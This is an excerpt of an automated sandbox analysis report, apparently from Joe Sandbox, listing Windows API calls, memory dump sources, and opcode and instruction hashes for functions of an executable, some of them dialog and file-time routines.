                                                                                          • Opcode Fuzzy Hash: 4d9168f1129fbf244a4fc5c9b7f48f4de068babf8689a93d48c17fa8bc0de683
                                                                                          • Instruction Fuzzy Hash: EAB012D727850B7C394BD2043D02C37010CC0C0B14330941FF904C4340E8401C04C632
                                                                                          APIs
                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 003DC738
                                                                                            • Part of subcall function 003DCABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 003DCB39
                                                                                            • Part of subcall function 003DCABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 003DCB4A
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                          Similarity
                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                          • String ID:
                                                                                          • API String ID: 1269201914-0
                                                                                          • Opcode ID: 49540c0cd07f4f4b34cab6eeca248e8f9148ae0556d40ea8b59b541f7d78b268
                                                                                          • Instruction ID: ac4f545ccaab2bb7102dec6ed552ed5739e8184da71e607167b5374dc0d6df73
                                                                                          • Opcode Fuzzy Hash: 49540c0cd07f4f4b34cab6eeca248e8f9148ae0556d40ea8b59b541f7d78b268
                                                                                          • Instruction Fuzzy Hash: 92B012D727840B7C394BD2047D02C37010CC0C0B15330551FF505C4340E8401C04C232
                                                                                          APIs
                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 003DC799
                                                                                            • Part of subcall function 003DCABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 003DCB39
                                                                                            • Part of subcall function 003DCABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 003DCB4A
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                          Similarity
                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                          • String ID:
                                                                                          • API String ID: 1269201914-0
                                                                                          • Opcode ID: 32495417aa1599822d797f27c36b14f42085d7c486466f1e24d9032dd2d46efc
                                                                                          • Instruction ID: 5908e48782c5c99c6aee723b5ead591aa4abf70b8639ca66061e166a33940ea6
                                                                                          • Opcode Fuzzy Hash: 32495417aa1599822d797f27c36b14f42085d7c486466f1e24d9032dd2d46efc
                                                                                          • Instruction Fuzzy Hash: CFB092D627850A6D254B92052802C36010DC084B10330941BB504C4340E8801C40C136
                                                                                          APIs
                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 003DC799
                                                                                            • Part of subcall function 003DCABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 003DCB39
                                                                                            • Part of subcall function 003DCABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 003DCB4A
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                          Similarity
                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                          • String ID:
                                                                                          • API String ID: 1269201914-0
                                                                                          • Opcode ID: 8e67f3a49d4ceec261d21e7e4f1b04ae441499b2b9ae5bea1bfab55187813a6b
                                                                                          • Instruction ID: b0e81f998942de3269829a2382b004372eb82108872c75070bfe1912717ac263
                                                                                          • Opcode Fuzzy Hash: 8e67f3a49d4ceec261d21e7e4f1b04ae441499b2b9ae5bea1bfab55187813a6b
                                                                                          • Instruction Fuzzy Hash: D5B012D737850B7D354B92003C46C37010EC0C1B10330D41FF904C4240ED801C44C032
                                                                                          APIs
                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 003DC799
                                                                                            • Part of subcall function 003DCABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 003DCB39
                                                                                            • Part of subcall function 003DCABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 003DCB4A
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                          Similarity
                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                          • String ID:
                                                                                          • API String ID: 1269201914-0
                                                                                          • Opcode ID: 5ae50ee52d35f804b7f8a8b79626987ad542e7fa400b5373a375a19ef9120ded
                                                                                          • Instruction ID: 4cb75ed76a8f957d8da4235de6e42b1f6a91ef83239304ef2b55c23cce3e4a34
                                                                                          • Opcode Fuzzy Hash: 5ae50ee52d35f804b7f8a8b79626987ad542e7fa400b5373a375a19ef9120ded
                                                                                          • Instruction Fuzzy Hash: 6DB092D627840A6D214B92042902C36010EC084B10330941BB504C5240E8801C49C032
                                                                                          APIs
                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 003DC738
                                                                                            • Part of subcall function 003DCABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 003DCB39
                                                                                            • Part of subcall function 003DCABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 003DCB4A
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                          Similarity
                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                          • String ID:
                                                                                          • API String ID: 1269201914-0
                                                                                          • Opcode ID: 858e40ed4d69254dc91a4ab1e84c370f4bd224aec54b9cf70390ff71df793633
                                                                                          • Instruction ID: 0029e7850bde882c148de6a313e3ea90c0fd07fb587b957e45a6ef3e73bf6e10
                                                                                          • Opcode Fuzzy Hash: 858e40ed4d69254dc91a4ab1e84c370f4bd224aec54b9cf70390ff71df793633
                                                                                          • Instruction Fuzzy Hash: DCA001A76B950BBC394BA2517D06C7B061DC4C5B69331A91FF91298691E9802845D631
                                                                                          APIs
                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 003DC738
                                                                                            • Part of subcall function 003DCABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 003DCB39
                                                                                            • Part of subcall function 003DCABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 003DCB4A
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                          Similarity
                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                          • String ID:
                                                                                          • API String ID: 1269201914-0
                                                                                          • Opcode ID: ec29db0ba0624b207fab912a8858e64b0a73aa7d12ba1c1566fd6e793493c7ab
                                                                                          • Instruction ID: 0029e7850bde882c148de6a313e3ea90c0fd07fb587b957e45a6ef3e73bf6e10
                                                                                          • Opcode Fuzzy Hash: ec29db0ba0624b207fab912a8858e64b0a73aa7d12ba1c1566fd6e793493c7ab
                                                                                          • Instruction Fuzzy Hash: DCA001A76B950BBC394BA2517D06C7B061DC4C5B69331A91FF91298691E9802845D631
                                                                                          APIs
                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 003DC738
                                                                                            • Part of subcall function 003DCABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 003DCB39
                                                                                            • Part of subcall function 003DCABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 003DCB4A
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                          Similarity
                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                          • String ID:
                                                                                          • API String ID: 1269201914-0
                                                                                          • Opcode ID: 77aabaa0b8c68c9b5485bd42b817047ee5febbd7102640ad1149da10473b2448
                                                                                          • Instruction ID: 0029e7850bde882c148de6a313e3ea90c0fd07fb587b957e45a6ef3e73bf6e10
                                                                                          • Opcode Fuzzy Hash: 77aabaa0b8c68c9b5485bd42b817047ee5febbd7102640ad1149da10473b2448
                                                                                          • Instruction Fuzzy Hash: DCA001A76B950BBC394BA2517D06C7B061DC4C5B69331A91FF91298691E9802845D631
                                                                                          APIs
                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 003DC799
                                                                                            • Part of subcall function 003DCABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 003DCB39
                                                                                            • Part of subcall function 003DCABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 003DCB4A
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                          Similarity
                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                          • String ID:
                                                                                          • API String ID: 1269201914-0
                                                                                          • Opcode ID: d33efe731e95424691990700bc22235465fb79b92962675908386672a4ef3c2d
                                                                                          • Instruction ID: 5bdaa3cdf406f5c157582e5822701312f1c64d5e870e4944cd358388e3a512f4
                                                                                          • Opcode Fuzzy Hash: d33efe731e95424691990700bc22235465fb79b92962675908386672a4ef3c2d
                                                                                          • Instruction Fuzzy Hash: 30A011E32B800BBC300BA2003C02C3B020CC0C8B20330A80FF80288280AC802880C030
                                                                                          APIs
                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 003DC799
                                                                                            • Part of subcall function 003DCABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 003DCB39
                                                                                            • Part of subcall function 003DCABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 003DCB4A
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                          Similarity
                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                          • String ID:
                                                                                          • API String ID: 1269201914-0
                                                                                          • Opcode ID: deb41eb5f02277f166b7f44982ecc05b715104ce3ea3f4a46c4e6a7bccc37286
                                                                                          • Instruction ID: 5bdaa3cdf406f5c157582e5822701312f1c64d5e870e4944cd358388e3a512f4
                                                                                          • Opcode Fuzzy Hash: deb41eb5f02277f166b7f44982ecc05b715104ce3ea3f4a46c4e6a7bccc37286
                                                                                          • Instruction Fuzzy Hash: 30A011E32B800BBC300BA2003C02C3B020CC0C8B20330A80FF80288280AC802880C030
                                                                                          APIs
                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 003DC738
                                                                                            • Part of subcall function 003DCABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 003DCB39
                                                                                            • Part of subcall function 003DCABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 003DCB4A
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                          Similarity
                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                          • String ID:
                                                                                          • API String ID: 1269201914-0
                                                                                          • Opcode ID: 6e54ef7c7b6afb33c99484ffb180e3062455a99b755831d6a95dd70364f333da
                                                                                          • Instruction ID: 0029e7850bde882c148de6a313e3ea90c0fd07fb587b957e45a6ef3e73bf6e10
                                                                                          • Opcode Fuzzy Hash: 6e54ef7c7b6afb33c99484ffb180e3062455a99b755831d6a95dd70364f333da
                                                                                          • Instruction Fuzzy Hash: DCA001A76B950BBC394BA2517D06C7B061DC4C5B69331A91FF91298691E9802845D631
                                                                                          APIs
                                                                                          • SetEndOfFile.KERNELBASE(?,003C8EDB,?,?,-00001954), ref: 003C9B6D
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                          Similarity
                                                                                          • API ID: File
                                                                                          • String ID:
                                                                                          • API String ID: 749574446-0
                                                                                          • Opcode ID: 1de93288f99dab125e59c1e183ffaadbaef3961ed70d79e83945b344779975b2
                                                                                          • Instruction ID: a77b7d196a88e8971dea6d0a84cff24a8b2cb5193db733dce8fc2aa5c87cefa1
                                                                                          • Opcode Fuzzy Hash: 1de93288f99dab125e59c1e183ffaadbaef3961ed70d79e83945b344779975b2
                                                                                          • Instruction Fuzzy Hash: 94B011300E000AAA8F022B38CC08C203A28EA2230AB0082A0A00AC80A2CF22C002AA00
                                                                                          APIs
                                                                                          • SetCurrentDirectoryW.KERNELBASE(?,003D927A,00402120,00000000,00403122,00000006), ref: 003D9027
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentDirectory
                                                                                          • String ID:
                                                                                          • API String ID: 1611563598-0
                                                                                          • Opcode ID: b910883f224866fd24c803ed340dafb40c421d41e10544362802184b0f83ae3a
                                                                                          • Instruction ID: 0a0a9844efcdb7f3b99564510610f663a3e0acb50331a0c66f59e24b9bd1a422
                                                                                          • Opcode Fuzzy Hash: b910883f224866fd24c803ed340dafb40c421d41e10544362802184b0f83ae3a
                                                                                          • Instruction Fuzzy Hash: 36A0123019410646CA010B34CC09C2576545760702F0086307002C00A0CB318810E500
                                                                                          APIs
                                                                                          • CloseHandle.KERNELBASE(000000FF,?,?,003C9473), ref: 003C94BE
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                          Similarity
                                                                                          • API ID: CloseHandle
                                                                                          • String ID:
                                                                                          • API String ID: 2962429428-0
                                                                                          • Opcode ID: 769051e4dd16db75ce34500311cacce4abad32fcdcee375f8e9d350adfa0f941
                                                                                          • Instruction ID: 03d25dac59f0110b45a431ac9fa638c261b82597f98f68a932d0196164ce2a6d
                                                                                          • Opcode Fuzzy Hash: 769051e4dd16db75ce34500311cacce4abad32fcdcee375f8e9d350adfa0f941
                                                                                          • Instruction Fuzzy Hash: 49F0BE30182B148EDB3ACA25D50DB92B3E89B11722F068B1FD0E6838E0D365AC4A8B10
                                                                                          APIs
                                                                                            • Part of subcall function 003C12E7: GetDlgItem.USER32(00000000,00003021), ref: 003C132B
                                                                                            • Part of subcall function 003C12E7: SetWindowTextW.USER32(00000000,003F02E4), ref: 003C1341
                                                                                          • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 003DA5C8
                                                                                          • EndDialog.USER32(?,00000006), ref: 003DA5DB
                                                                                          • GetDlgItem.USER32(?,0000006C), ref: 003DA5F7
                                                                                          • SetFocus.USER32(00000000), ref: 003DA5FE
                                                                                          • SetDlgItemTextW.USER32(?,00000065,?), ref: 003DA63E
                                                                                          • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 003DA671
                                                                                          • FindFirstFileW.KERNEL32(?,?), ref: 003DA687
                                                                                          • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 003DA6A5
                                                                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 003DA6B5
                                                                                          • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 003DA6D2
                                                                                          • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 003DA6F0
                                                                                            • Part of subcall function 003CD142: LoadStringW.USER32(?,?,00000200,?), ref: 003CD187
                                                                                            • Part of subcall function 003CD142: LoadStringW.USER32(?,?,00000200,?), ref: 003CD19D
                                                                                          • _swprintf.LIBCMT ref: 003DA720
                                                                                            • Part of subcall function 003C3F5B: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 003C3F6E
                                                                                          • SetDlgItemTextW.USER32(?,0000006A,?), ref: 003DA733
                                                                                          • FindClose.KERNEL32(00000000), ref: 003DA736
                                                                                          • _swprintf.LIBCMT ref: 003DA791
                                                                                          • SetDlgItemTextW.USER32(?,00000068,?), ref: 003DA7A4
                                                                                          • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 003DA7BA
                                                                                          • FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 003DA7DA
                                                                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 003DA7EA
                                                                                          • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 003DA804
                                                                                          • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 003DA81C
                                                                                          • _swprintf.LIBCMT ref: 003DA84D
                                                                                          • SetDlgItemTextW.USER32(?,0000006B,?), ref: 003DA860
                                                                                          • _swprintf.LIBCMT ref: 003DA8B0
                                                                                          • SetDlgItemTextW.USER32(?,00000069,?), ref: 003DA8C3
